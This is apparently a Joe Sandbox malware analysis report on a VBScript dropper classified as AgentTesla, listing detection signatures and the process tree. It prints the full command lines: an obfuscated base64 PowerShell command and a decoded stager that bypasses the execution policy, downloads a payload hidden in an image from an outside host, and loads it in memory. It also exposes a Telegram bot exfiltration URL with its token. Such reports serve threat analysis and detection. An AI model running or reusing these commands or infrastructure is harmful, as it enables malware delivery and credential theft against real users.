Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Reconfirm Details.vbs

Overview

General Information

Sample name:Reconfirm Details.vbs
Analysis ID:1430755
MD5:0a5a39c1f5e6f3995906a7a7829b5022
SHA1:b469f4de7da98dc2e8fdfeb4de8e9e3e62fa28e9
SHA256:123a63013a4dcff0add31ab4234ea1894fc33b1797c8c2c58b9ae7b8419094a0
Tags:vbs
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected Powershell download and execute
Yara detected Telegram RAT
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6728 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebgBvDgTreGgDgTreLwBiDgTreGEDgTreLwBtDgTreG8DgTreYwDgTreuDgTreG8DgTreYwBzDgTreG4DgTrebwBzDgTreGgDgTrebQDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MSBuild.exe (PID: 3948 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 4332 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 5684 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage?chat_id=595808702"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3315094213.00000000032AA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000007.00000002.3305111919.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            00000007.00000002.3315094213.000000000328E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              7.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  7.2.MSBuild.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    7.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x33cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x33d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x33dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x33e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x33f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3408e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    SourceRuleDescriptionAuthorStrings
                    amsi64_1472.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      Spreading

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandL

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDg